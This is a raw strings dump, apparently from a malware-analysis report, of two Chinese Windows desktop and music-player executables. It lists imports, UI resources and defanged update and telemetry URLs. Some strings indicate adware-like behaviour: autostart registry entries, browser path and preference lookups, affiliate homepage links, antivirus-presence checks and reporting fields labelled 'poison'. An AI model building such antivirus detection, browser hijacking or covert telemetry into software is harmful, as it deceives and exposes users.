[0xI64X] ANOMALY: ret has invalid operand 1
[0xI64X] ANOMALY: retf has invalid operand 1
[0xI64X] ANOMALY: Instruction "%s" is modifying the stack
[0xI64X] ANOMALY: "%s" has invalid stack change 0xX
%s:[%s]
0xX=
]=0xX
[0xI64X] ANOMALY: Unexpected operand size prefix
%s 0xX:[
%s %s:[
[0xI64X] ERROR: mod != 3 for AMODE_PR ("%s")
[0xI64X] ERROR: invalid mmx register %d for AMODE_PR ("%s")
[0xI64X] ERROR: AMODE_PR illegal in 16-bit mode ("%s")
[0xI64X] ERROR: mod != 3 for AMODE_VR ("%s")
[0xI64X] ERROR: AMODE_VR illegal in 16-bit mode ("%s")
[0xI64X] ERROR: invalid mmx register %d for AMODE_P ("%s")
[0xI64X] ERROR: AMODE_P illegal in 16-bit mode ("%s")
[0xI64X] ERROR: mod != 3 for AMODE_R ("%s")
seg_X
[0xI64X] ERROR: mod = 3 for AMODE_M ("%s")
[0xI64X] ERROR: mod = 3 for AMODE_E with OPTYPE_p ("%s")
SupportKey
TextSurportAlpha
SupportAlpha
SurportAlpha
</%s>
<?%s?>
<!--%s-->
<!%s>
&#xX;
%s="%s"
%s='%s'
<![CDATA[%s]]>
version="%s"
encoding="%s"
standalone="%s"
XXXXXX
%s:x
package_url
F:\MyWorks\[PersonalProj]\AppleDesktop\Output\Bin\Release\AppleDesktop.pdb
GetProcessHeap
GetWindowsDirectoryW
CreateIoCompletionPort
WinExec
KERNEL32.dll
keybd_event
GetKeyState
MsgWaitForMultipleObjects
USER32.dll
GDI32.dll
COMDLG32.dll
RegEnumKeyExW
RegOpenKeyExW
RegCloseKey
RegNotifyChangeKeyValue
RegDeleteKeyW
RegQueryInfoKeyW
RegCreateKeyExW
ADVAPI32.dll
SHFileOperationW
ShellExecuteW
ShellExecuteExW
SHELL32.dll
ole32.dll
OLEAUT32.dll
UrlGetPartW
SHLWAPI.dll
imagehlp.dll
COMCTL32.dll
MSIMG32.dll
GdiplusShutdown
gdiplus.dll
HttpQueryInfoW
InternetCrackUrlW
HttpOpenRequestW
HttpSendRequestW
WININET.dll
CRYPT32.dll
IPHLPAPI.DLL
PSAPI.DLL
NETAPI32.dll
VERSION.dll
GetCPInfo
zcÁ
.?AV?$_Ref_count@VCHttpRequest@@@std@@
.?AVCKeyboardFilter@@
.?AUxUIMsg@@
.?AV?$_Ref_count@VCHttpResponse@@@std@@
.?AV?$CThreadPool@VCDownloadWorker@CHttpDownloader@@VCRTThreadTraits@ATL@@VWin32WaitTraits@4@@ATL@@
.?AV?$CMessageCallbackSink@VCHttpDownloader@@@@
.?AV?$CComObject@V?$CHttpDownloadEvent@VCUpdateMgr@@UIHttpDownloadEvent@@@@@ATL@@
.?AV?$IDispatchImpl@UIHttpDownloadEvent@@$1?_GUID_6e565453_ad3d_4b44_8746_c5283f0a05e5@@3U__s_GUID@@B$1?m_libid@CAtlModule@ATL@@2U_GUID@@A$00$0A@VCComTypeInfoHolder@ATL@@@ATL@@
.?AV?$CHttpDownloadEvent@VCUpdateMgr@@UIHttpDownloadEvent@@@@
.?AV?$CComPtrBase@V?$CHttpDownloadEvent@VCUpdateMgr@@UIHttpDownloadEvent@@@@@ATL@@
.?AV?$CComPtr@V?$CHttpDownloadEvent@VCUpdateMgr@@UIHttpDownloadEvent@@@@@ATL@@
.?AV?$CHttpDownloadEventPtr@VCUpdateMgr@@@@
.?AUIHttpDownloadEvent@@
.?AV?$CComObject@V?$CHttpDownloadEvent@VCDataReporter@@UIHttpDownloadEvent@@@@@ATL@@
.?AV?$CxTimer@VCDataReporter@@@@
.?AV?$CHttpDownloadEvent@VCDataReporter@@UIHttpDownloadEvent@@@@
.?AV?$CComPtrBase@V?$CHttpDownloadEvent@VCDataReporter@@UIHttpDownloadEvent@@@@@ATL@@
.?AV?$CComPtr@V?$CHttpDownloadEvent@VCDataReporter@@UIHttpDownloadEvent@@@@@ATL@@
.?AV?$CHttpDownloadEventPtr@VCDataReporter@@@@
.?AV?$CComObject@V?$CHttpDownloadEvent@VCCloudConfigCenter@@UIHttpDownloadEvent@@@@@ATL@@
.?AV?$CHttpDownloadEvent@VCCloudConfigCenter@@UIHttpDownloadEvent@@@@
.?AV?$CComPtrBase@V?$CHttpDownloadEvent@VCCloudConfigCenter@@UIHttpDownloadEvent@@@@@ATL@@
.?AV?$CComPtr@V?$CHttpDownloadEvent@VCCloudConfigCenter@@UIHttpDownloadEvent@@@@@ATL@@
.?AV?$CHttpDownloadEventPtr@VCCloudConfigCenter@@@@
00000000000000000010
00000000000000000001
3333333
33333333
333333333
3333333333
^$>>>>%7
cOXY/P.Z0.0.QR00/ZPP0000000/0PPZR.BI@/DE0,
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
<assemblyIdentity type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='x86' publicKeyToken='6595b64144ccf1df' language='*' />
9(939@9_9
5V5D5L5V6f6
04181<1@1
>#?)?3?9?
<!='=1=;=@=
=#=(=2=:=@=
515 6 6:6
2/343;4@4
5-6:6?6~6
6 6$6(6,606
7&888&989
9&:8:\:6;
45
;(<,<0<4<8<<<
4%4*474<4}4
2%3*3/3_3
7q7F7W7]7r7
1.24282<2@2
1'1,181=1\1
4"4&4*4.424
1"1&1*1.121
0%1U1z1
= =$=(=,=0=4=8=<=@=
= =$=(=,=0=
1 1$1(1,10141
: :$:(:,:0:4:
1,181@1`1|1
combase.dll
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
portuguese-brazilian
USER32.DLL
\Common\SplitterV.png
\Common\SplitterH.png
::{645FF040-5081-101B-9F08-00AA002F954E}
360chrome
chrome
firefox
from=%s&result=%s&extradata=%s
::{871C5380-42A0-1069-A2EA-08002B30309D}
360se.exe
360chrome.exe
Maxthon.exe
Chrome.exe
liebao\liebao.exe
SogouExplorer.exe
Mozilla Firefox\firefox.exe
TheWorld.exe
UCBrowser.exe
QQBrowser.exe
360Chrome
Chrome
Firefox
hao123.com
hao.360.cn
VVV.2345.com
%s\UCBrowser\User Data\Default\Preferences
T.jpg|.jpe|.jpeg|.png|.bmp|.gif|.tif|.tiff|.jfif|.dib
_hXXp://update.9vh.net/check_update/update_info.json
_hXXp://appledesktop.sinaapp.com/dc/%s/%s/%s/%s/%d/%d/%s/?
hXXp://appledesktop.sinaapp.com/dcp/%s/%s/%s/%s/%d/%d/%s/?
_hXXp://appledesktop.sinaapp.com/cloudconfig/%s/%s/%d/%d/?ts=%lu
@@hXXp://int.dpool.sina.com.cn/iplookup/iplookup.php?format=js
\FolderView\FolderThemeBkg.png
%windir%\system32\control.exe
/name Microsoft.Personalization
%programfiles%\Windows Sidebar\sidebar.exe
desk.cpl
%s\%s
shell32.dll,Control_RunDLL desk.cpl
rundll32.exe
%s (%d)
appwiz.cpl,NewLinkHere %s
%s\%s -
(%d)%s
dexplorer.exe
hXXp://tieba.baidu.com/f?kw=苹果桌面&ie=utf-8&ie=utf-8&fr=wwwt
autoCreateOnOneKeyClearUp
Kernel32.dll
Internet Explorer\iexplore.exe
Advapi32.dll
comctl32.dll
kernel32.dll
%d-%d-%d-%d-%d-%d-%d-%d-%d-%d-%d-%d-%d-%s
{71DA5947-B28E-4480-9E54-C17D7DDAB7A3}
color_blue.png
color_red.png
color_purple.png
color_green.png
color_yellow.png
color_orange.png
color_grey.png
color_reset.png
color_blue_xp.bmp
color_red_xp.bmp
color_purple_xp.bmp
color_green_xp.bmp
color_yellow_xp.bmp
color_orange_xp.bmp
color_grey_xp.bmp
color_reset_xp.bmp
\Icon\lemon.png
\Icon\new_folder.png
\Icon\onekey_cleanup.png
\Icon\change_textbk.png
\Icon\lemon_12_13_xp.bmp
\Icon\new_folder_12_13_xp.bmp
\Icon\onekey_cleanup_12_13_xp.bmp
\Icon\change_textbk_xp.bmp
Proxy.bat
\Icon\create_folder.png
\Icon\create_folder_15_16.bmp
\Icon\create_shortcut.png
\Icon\create_shortcut_15_16.bmp
\Icon\display_size.png
\Icon\gadgets.png
\Icon\personalization.png
\create_folder.png
\create_folder_15_16.bmp
\create_shortcut.png
\create_shortcut_15_16.bmp
t{B01C45A4-591C-4577-B56E-59B254647F54}
Shell32.dll
\Icon\%s
\FolderView\btn_unlock.png
\FolderView\btn_lock.png
\FolderView\btn_iconmode.png
\FolderView\btn_noiconmode.png
\FolderView\FolderFrame.xml
\FolderView\icon-showlist.png
\FolderView\icon-showicon.png
\FolderView\btn_add.png
\FolderView\folder_view_bg_normal.png
\FolderView\folder_view_bg_down.png
KernelBase.dll
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
C\\.\%s
%s_%d_%d_%d
ExpandToFullPath Enter %s
ExpandToFullPath trim "" %s
ExpandToFullPath IsEmpty && PathIsRelative %s
imageres.dll
_ParseAssociateIcon PathIsRoot %s
%systemroot%
_ParseAssociateIcon checkpath %s
_ParseAssociateIcon SHGetValue(HKEY_CLASSES_ROOT, pExtName, NULL, &dwType, NULL, &dwSize)
%s\DefaultIcon
%s\CurVer
%s\shell\open\command
_ParseAssociateIcon command %s
_ParseAssociateIcon return %s
IconParser::Parse %s %s %d
base_%d
flg_%d
DFILE_ACTION_ADDED strFileName = %s
FILE_ACTION_REMOVED strFileName = %s
FILE_ACTION_RENAMED_NEW_NAME strFileName = %s, strNewFileName = %s
FILE_ACTION_MODIFIED strFileName = %s
Q360SoftMgrMsgDelegateWnd%d
Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel
Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu
{20D04FE0-3AEA-1069-A2D8-08002B30309D}
{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}
{59031a47-3f72-44a7-89c5-5595fe6b30ee}
{645FF040-5081-101B-9F08-00AA002F954E}
{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}
{871C5380-42A0-1069-A2EA-08002B30309D}
{450D8FBA-AD25-11D0-98A8-0800361B1103}
{208D2C60-3AEA-1069-A2D7-08002B30309D}
{21EC2020-3AEA-1069-A2DD-08002B30309D}
Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID
%s\%s\%s
Software\Microsoft\Windows\CurrentVersion\Themes
Software\Microsoft\Windows\CurrentVersion\ThemeManager
tshell32.dll
%windir%\system32\rundll32.exe
m.url
::{450D8FBA-AD25-11D0-98A8-0800361B1103}
::{59031a47-3f72-44a7-89c5-5595fe6b30ee}
::{20D04FE0-3AEA-1069-A2D8-08002B30309D}
::{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}
::{208D2C60-3AEA-1069-A2D7-08002B30309D}
::{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}
::{21EC2020-3AEA-1069-A2DD-08002B30309D}
E..\360Dtsc.ini
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
%s\TypeOverlay
Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts
.library-ms
\SettingCenter\PageCommon.xml
\SettingCenter\PageUpdate.xml
B\Common\Tracker.png
\ / : * ? " < > |
\FolderView\drop_createfolder.png
\FolderView\drop_createfolder_hover.png
Ftextbk_blue.png
textbk_red.png
textbk_purple.png
textbk_green.png
textbk_yellow.png
textbk_orange.png
textbk_gray.png
textbk_blue2.png
textbk_red2.png
textbk_purple2.png
textbk_green2.png
textbk_yellow2.png
textbk_orange2.png
textbk_gray2.png
\Common\%s
\SettingCenter\SettingCenterWnd.xml
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
F%s.skn
d\MainFrame\MainFrame.xml
(%c) -
%s (%c) -
\MainFrame\UserGuide.xml
G\Common\apphoverbk.png
\Common\BkgSelectedPressed.png
\Common\BkgSelectedHover.png
\Common\shortcut_16.png
\Common\shortcut_21.png
G\Common\shortcut_10.png
Disassembler->Instruction.Address == Address
Disassembler->Instruction.Length < MAX_INSTRUCTION_LENGTH
X86Instruction->SrcAddressIndex == OperandIndex || X86Instruction->DstAddressIndex == OperandIndex
!(Operand->Length & 1)
X86Instruction->OperandSize == 2
Instruction->OpcodeLength == 2 && X86Instruction->HasModRM && Instruction->OperandCount == 2
X86Instruction->OperandSize == 8
X86Instruction->OperandSize >= 4
!(Instruction->Operands[0].Flags & 0x7F)
!(Instruction->Operands[1].Flags & 0x7F)
!(Instruction->Operands[2].Flags & 0x7F)
Instruction->OperandCount == 1
!Instruction->CodeBranch.AddressOffset
Operand1->Length <= 0xFF
Operand1->Flags & OP_ADDRESS
Operand1->Type == OPTYPE_OFFSET
!(Operand1->Flags & (OP_GLOBAL|OP_FAR))
!Instruction->DataDst.Count
!Instruction->DataSrc.Count
Operand->Length <= 0xFF
Instruction->OperandCount == 1 && Operand1->Length
!(Operand->Flags & 0x7F)
>Operand->Flags & (OP_EXEC|OP_SRC|OP_DST)
>OperandIndex < 2
OperandIndex == 1
Operand->Length == 1
X86Instruction->OperandSize >= Operand->Length
(Operand->Flags & OP_EXEC) && (Instruction->Groups & ITYPE_EXEC)
(Operand)->TargetAddress
(Operand)->Length <= 8
(Operand)->Flags & OP_FAR
[!((Operand)->Flags & OP_FAR)
X86_Registers[Operand->Register]
Operand->Length
%d,%d,%d,%d
e%d,%d
%d,%d,%d
Limage_file_%s
A%s.idx
NtDll.dll
Windows 2000
Windows NT
Windows 2003
Windows XP
Windows 7
Windows Vista
Windows 8.1
Windows 8
Windows ME
Windows 9x
Windows 3.2
hXXps://
hXXp://
PTF://
%s.write_cache
D%s_%s
dbghelp.dll
r%s_ddd-ddd_%s.dmp
/%s="%s"
..\xLogConfig.ini
[%s] %s
N%s.%lu
%d.%d.%d.%d
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Internet Security
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\QQPCMgr
hXXp://inapi.9vh.net/index.php?encode=%s&process=%s
%lu*Yes,pca*%s,pod*%d,uod*%d,os*%s,poison*%s,status*%lu,list*%s
FhXXp://wcapi.9vh.net/index.php?encode=%s&process=%s
%lu*Yes,pca*%s,poison*%s,Version*%s,last_times*%I64d,status*%lu
\AppleDesktop.exe
1970-1-1
Software\Microsoft\Windows\CurrentVersion\Uninstall\
"%s" /from=autorun
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\iApple.exe
..\..\iApple.exe
..\iApple.exe
AppleDesktop.exe
AppleDTAssistant.exe
Helper\AppleHelper.exe
AppleConfig.ini
AppleData.add
AIcoCache.dat
CCC.add
AppleROData.dat
AppleROCfg.ini
AppleSC.json
AppleDCR.xml
uhXXp://appledesktop.sinaapp.com/check_update/%s/%s/%lu/%lu/
from=%s
from=%s&result=guif
Download Update Info[%s]
Download Update File Url[%s], LocalFile[%s]
from=%s&result=dpf&nv=%s
Download Update Info Result[%d]
Download Update File Result[%d]
Local Version < New Version[%s], Need Update
Update Info List Size[%u]
Hit Update Info index is %d
from=%s&result=nhr&nv=%s
Update Ratio is %u%%, and Hit Ratio! CheckUpdateInfo return TRUE!
from=%s&result=puif
Update Ratio is %u%%, and NOT Hit Ratio!
CheckInstall(%s)
from=%s&result=vpf&nv=%s
UpdatePackage Result is %d
from=%s&result=%s&nv=%s
SetupUpdatePackage(%s)
SrcFile[%s] is not Exist!
ExtractUpdatePackage(%s)
Replace NewFile[%s] To LocalFile[%s]. Result[%d]
InstallRoutine(Update:%d)
O\\.\PhysicalDrive%d
\\.\Scsi%d:
SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards
OX-X-X-X-X-X
xxxxxxxxxxxxxxxx
Assertion failed: %s, file %s, line %d
%Documents and Settings%\%current user%\Application Data\AppleDesktop\2.0.1.1001\AppleDesktop.exe
%Documents and Settings%\%current user%\Application Data\AppleDesktop\2.0.1.1001\AppleDTAssistant.exe
%Documents and Settings%\%current user%\Application Data\AppleDesktopData\Dump
ppleDesktop.exe\
AppleDesktop.exe_2.0.1.1001
2.0.1.1001

fm4.exe_260:




.text
`.rdata
@.data
.rsrc
@.reloc
u.jAh
t.HuZ
xSSSh
FTPjKS
FtPj;S
C.PjRV
Visual C   CRT: Not enough memory to complete call to strerror.
GetProcessWindowStation
portuguese-brazilian
Broken pipe
Inappropriate I/O control operation
Operation not permitted
operator
windows936
windows932
windows874
windows1257
windows1256
windows1255
windows1254
windows1253
windows1252
windows1251
windows1250
Invalid or unsupported charset:
%sData\user2.ini
Software\Microsoft\Windows\CurrentVersion\Uninstall
Software\Microsoft\Windows\CurrentVersion\Uninstall\{06F57725-D702-43A9-A8D4-40BB36C9B07F}
Unins.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
AutoRunTipFrame.xml
FrmColor.xml
\SysConfig.ini
FrmConfig.xml
Data\dh.ini
ShowHideWindowKey
ExitWindowKey
tab_hotkey
Software\Microsoft\Windows\CurrentVersion\Run
BoxNews.exe
"%s%s" -mini
"%s" -mini
%s\%s
favorfm.xml
channels.xml
E:\zhuyicheng\boost_1_53_0\boost/property_tree/detail/ptree_implementation.hpp
E:\zhuyicheng\boost_1_53_0\boost/property_tree/xml_parser.hpp
E:\zhuyicheng\boost_1_53_0\boost/property_tree/detail/xml_parser_read_rapidxml.hpp
E:\zhuyicheng\boost_1_53_0\boost/property_tree/detail/xml_parser_write.hpp
E:\zhuyicheng\boost_1_53_0\boost/property_tree/string_path.hpp
FrmFeedBack.xml
hXXp://tongji.yinyue.fm/feedback/b.html
Data/setup.ini
FrmHotKeyTip.xml
HotKeyTipFrame
hotkey
d:d:d
FrmLrcChild.xml
FrmLrc.xml
Source Files\LrcFrame.cpp
BtnLogin
fm4.exe
hXXp://VVV.hao123.com/?tn=98868055_hao_pg
hXXp://update.yinyue.fm/goUrl.html?
Skin.rs
Skin\mainframeshadow.png
hXXp://updatetest.wuji.com/stj.ashx
1.0.0.1
FHSev.exe
Skin\progresstooltip.png
__HotKeyTipWindow
__HotKeyTipClass
Skin\hotkeytipbk.png
adb.exe
aapt.exe
apnews.exe
FrmPlayer.xml
60,8,100,118
60,24,100,134
Source Files\MainFrame.cpp
file='suspensiontopa.png'
file='suspensiontop.png'
file='suspensiontopahover.png'
file='btn-play.png' source='0,0,64,64'
file='btn-play.png' source='0,64,64,128'
file='btn-play.png' source='0,128,64,192'
file='lyrictoplay.png'
pl_play.png
file='btn-pause.png' source='0,0,64,64'
file='btn-pause.png' source='0,64,64,128'
file='btn-pause.png' source='0,128,64,192'
file='play0520.png' source='0,0,35,20'
file='play0520.png' source='0,20,35,40'
file='play0520.png' source='0,40,35,59'
pl_pause.png
file='loading0%d.png'
-d:d:d
-d:d
file='play0520.png' source='0,0,35,20'
file='play0520.png' source='0,20,35,40'
file='play0520.png' source='0,40,35,59'
file='bk.png'
lyriclikea2.png
lyriclike.png
lyriclikea.png
MessageBox.xml
Source Files\MusicPlayer.cpp
hXXp://update.yinyue.fm/
<4,$?7/'
(3-!0,1'8"5.*2$
Data\server.ini
Data\Version.ini
appupdate/ver.txt
PlayerUpdate.exe
FrmPlayList.xml
FrmPopWnd.xml
WebBrowserEx
hXXp://update.yinyue.fm/url.txt
FrmProgressToolTip.xml
%d:d
hXXp://tongji.yinyue.fm/
a.ashx
00:00:00:00:00:00
%d-%d-%d %d:%d:%d
icon/ccjs.ico
icon/ie.ico
Internet Explorer YyfmPlay.lnk
icon\gouwu.ico
hXXp://update.yinyue.fm//dh.txt
icon\ccjs.ico
icon\ie.ico
X:X:X:X:X:X
//./%s
Data/version.ini
2000-01-01
2000-01-01 00:00:00
Data/client.ini
Data/dh.ini
Software\Microsoft\Windows NT\CurrentVersion
Data/user2.ini
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\TheWorld.exe
\TheWorld.ini
\Baidu\browser\config.ini
\SogouExplorer\config.xml
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Maxthon2
SharedAccount\Config\Config.ini
SetTipFrame.xml
FrmSetWindowLrcFrame.xml
Source Files\SetWindowLrcFrame.cpp
FrmSystemMenuFrame.xml
event_edit_keydown_eshowhide
event_edit_keydown_eexit
file='list_play.png' dest='6,6,24,24'
file='list_pause.png' dest='6,6,24,24'
<i arrow_2.png>
<i arrow_1.png>
2-0-0|1-0-0
1-0-0|1-0-0
3-0-0|1-0-0
4-0-0|1-0-0
5-0-0|1-0-0
6-0-0|1-0-0
list_item.xml
operation
frmWindowLrc.xml
frmWindowLrcParent.xml
hXXp://VVV.9ku.com/lrc2/
hXXp://VVV.9ku.com/fm/
hXXp://img.9ku.com
hXXp://mp3.9ku.com
E:\zhuyicheng\boost_1_53_0\boost/property_tree/detail/json_parser_read.hpp
hXXp://player.kuwo.cn/webmusic/st/getMuiseDate?flag=3&r=&pd=
hXXp://fm.baidu.com/dev/api/?tn=playlist&id=
hXXp://music.baidu.com/data/music/fmlink?type=mp3&rate=320&songIds=
hXXp://fm.baidu.com
hXXp://pan.baidu.com
hXXp://live.hkuradio.com/radio2?download=1
hXXp://imgs.diantai.ifeng.com/images/channelimg/update_uradio_new_yy.png
hXXp://live.hkuradio.com/radio1?download=1
hXXp://imgs.diantai.ifeng.com/images/channelimg/update_uradio_new_zh.png
hXXp://live.3gv.ifeng.com/live/zhongwen?fmt=mp3_32k_mp3
hXXp://imgs.diantai.ifeng.com/images/channelimg/ifeng_zwt_new.png
hXXp://live.3gv.ifeng.com/live/zixun?fmt=mp3_32k_mp3
hXXp://imgs.diantai.ifeng.com/images/channelimg/ifeng_zxt_new.png
hXXp://live.3gv.ifeng.com/live/hongkong?fmt=mp3_32k_mp3
hXXp://imgs.diantai.ifeng.com/images/channelimg/ifeng_xgt_new.png
hXXp://moblive.rbc.cn/fm876.mp3
hXXp://imgs.diantai.ifeng.com/images/channelimg/bg_wy_new.png
hXXp://moblive.rbc.cn/fm1039.mp3
hXXp://imgs.diantai.ifeng.com/images/channelimg/bg_bgjt_new.png
hXXp://moblive.rbc.cn/fm1006.mp3
hXXp://imgs.diantai.ifeng.com/images/channelimg/bg_xw_new.png
hXXp://moblive.rbc.cn/am603.mp3
hXXp://imgs.diantai.ifeng.com/images/channelimg/bg_bggs_new.png
hXXp://moblive.rbc.cn/fm1025.mp3
hXXp://imgs.diantai.ifeng.com/images/channelimg/bg_bgty_new.png
hXXp://moblive.rbc.cn/am774.mp3
hXXp://imgs.diantai.ifeng.com/images/channelimg/bg_bgwy_new.png
hXXp://moblive.rbc.cn/am927.mp3
hXXp://imgs.diantai.ifeng.com/images/channelimg/bg_bgaj_new.png
hXXp://moblive.rbc.cn/fm1073.mp3
hXXp://imgs.diantai.ifeng.com/images/channelimg/bg_bgcsfw_new.png
hXXp://VVV.xiami.com/radio/play/type/6/oid/0
libfm::fm_douban_impl::login
hXXp://VVV.douban.com/j/app/login
&password=
hXXp://VVV.douban.com/j/app/radio/people?app_name=radio_desktop_win&version=100&user_id=
hXXp://VVV.douban.com/j/app/radio/people?app_name=radio_desktop_win&version=100&type=
hXXp://shopcgi.qqmusic.qq.com/fcgi-bin/shopsearch.fcg?out=json&value=
"msg":
_0.jpg
hXXp://imgcache.qq.com/music/photo/album/
hXXp://music.qq.com/miniportal/static/lyric/
libfm::fm_impl::get_song_url
libfm::fm_impl::login
WinExec
KERNEL32.dll
GetAsyncKeyState
RegisterHotKey
UnregisterHotKey
USER32.dll
GDI32.dll
RegDeleteKeyA
RegCreateKeyExA
RegOpenKeyExA
RegOpenKeyA
RegCloseKey
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
ole32.dll
OLEAUT32.dll
avcore.dll
HttpQueryInfoA
InternetOpenUrlA
WININET.dll
SHLWAPI.dll
gdiplus.dll
?OnKeyDown@WindowImplBase@DuiLib@@UAEJIIJAAH@Z
?GetMessageMap@WindowImplBase@DuiLib@@MBEPBUDUI_MSGMAP@2@XZ
?SetAutoNavigation@CWebBrowserUI@DuiLib@@QAEX_N@Z
?SetHomePage@CWebBrowserUI@DuiLib@@QAEXPBD@Z
?Download@CWebBrowserUI@DuiLib@@UAGJPAUIMoniker@@PAUIBindCtx@@KJPAU_tagBINDINFO@@PB_W3I@Z
?Exec@CWebBrowserUI@DuiLib@@UAGJPBU_GUID@@KKPAUtagVARIANT@@1@Z
?QueryStatus@CWebBrowserUI@DuiLib@@UAGJPBU_GUID@@KQAU_tagOLECMD@@PAU_tagOLECMDTEXT@@@Z
?QueryService@CWebBrowserUI@DuiLib@@UAGJABU_GUID@@0PAPAX@Z
?FilterDataObject@CWebBrowserUI@DuiLib@@UAGJPAUIDataObject@@PAPAU3@@Z
?TranslateUrl@CWebBrowserUI@DuiLib@@UAGJKPA_WPAPA_W@Z
?GetDropTarget@CWebBrowserUI@DuiLib@@UAGJPAUIDropTarget@@PAPAU3@@Z
?GetOptionKeyPath@CWebBrowserUI@DuiLib@@UAGJPAPA_WK@Z
?TranslateAcceleratorA@CWebBrowserUI@DuiLib@@UAGJPAUtagMSG@@PBU_GUID@@K@Z
?TranslateAcceleratorA@CWebBrowserUI@DuiLib@@UAEJPAUtagMSG@@@Z
?ResizeBorder@CWebBrowserUI@DuiLib@@UAGJPBUtagRECT@@PAUIOleInPlaceUIWindow@@H@Z
?OnFrameWindowActivate@CWebBrowserUI@DuiLib@@UAGJH@Z
?OnDocWindowActivate@CWebBrowserUI@DuiLib@@UAGJH@Z
?EnableModeless@CWebBrowserUI@DuiLib@@UAGJH@Z
?UpdateUI@CWebBrowserUI@DuiLib@@UAGJXZ
?HideUI@CWebBrowserUI@DuiLib@@UAGJXZ
?ShowUI@CWebBrowserUI@DuiLib@@UAGJKPAUIOleInPlaceActiveObject@@PAUIOleCommandTarget@@PAUIOleInPlaceFrame@@PAUIOleInPlaceUIWindow@@@Z
?GetHostInfo@CWebBrowserUI@DuiLib@@UAGJPAU_DOCHOSTUIINFO@@@Z
?ShowContextMenu@CWebBrowserUI@DuiLib@@UAGJKPAUtagPOINT@@PAUIUnknown@@PAUIDispatch@@@Z
?Invoke@CWebBrowserUI@DuiLib@@UAGJJABU_GUID@@KGPAUtagDISPPARAMS@@PAUtagVARIANT@@PAUtagEXCEPINFO@@PAI@Z
?GetIDsOfNames@CWebBrowserUI@DuiLib@@UAGJABU_GUID@@PAPA_WIKPAJ@Z
?GetTypeInfo@CWebBrowserUI@DuiLib@@UAGJIKPAPAUITypeInfo@@@Z
?GetTypeInfoCount@CWebBrowserUI@DuiLib@@UAGJPAI@Z
?QueryInterface@CWebBrowserUI@DuiLib@@UAGJABU_GUID@@PAPAX@Z
?Release@CWebBrowserUI@DuiLib@@UAGKXZ
?AddRef@CWebBrowserUI@DuiLib@@UAGKXZ
?GetInterface@CWebBrowserUI@DuiLib@@UAEPAXPBD@Z
?GetClass@CWebBrowserUI@DuiLib@@UBEPBDXZ
??1CWebBrowserUI@DuiLib@@UAE@XZ
??0CWebBrowserUI@DuiLib@@QAE@XZ
?SetKeyboardEnabled@CControlUI@DuiLib@@UAEX_N@Z
?IsKeyboardEnabled@CControlUI@DuiLib@@UBE_NXZ
?Navigate2@CWebBrowserUI@DuiLib@@QAEXPBD@Z
DuiLib.dll
PSAPI.DLL
IPHLPAPI.DLL
NETAPI32.dll
GetCPInfo
GetProcessHeap
zcÁ
.?AVCWebBrowserUI@DuiLib@@
.?AVCHotKeyTipFrameWnd@@
.?AVCWebBrowserUIEx@@
.?AVWebBrowserEventSinker@@
.?AU?$grammar_helper@U?$grammar@U?$json_grammar@V?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@boost@@U?$parser_context@Unil_t@classic@spirit@boost@@@classic@spirit@4@@classic@spirit@boost@@U?$json_grammar@V?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@4@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@DV?$allocator@D@std@@@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@@impl@classic@spirit@boost@@
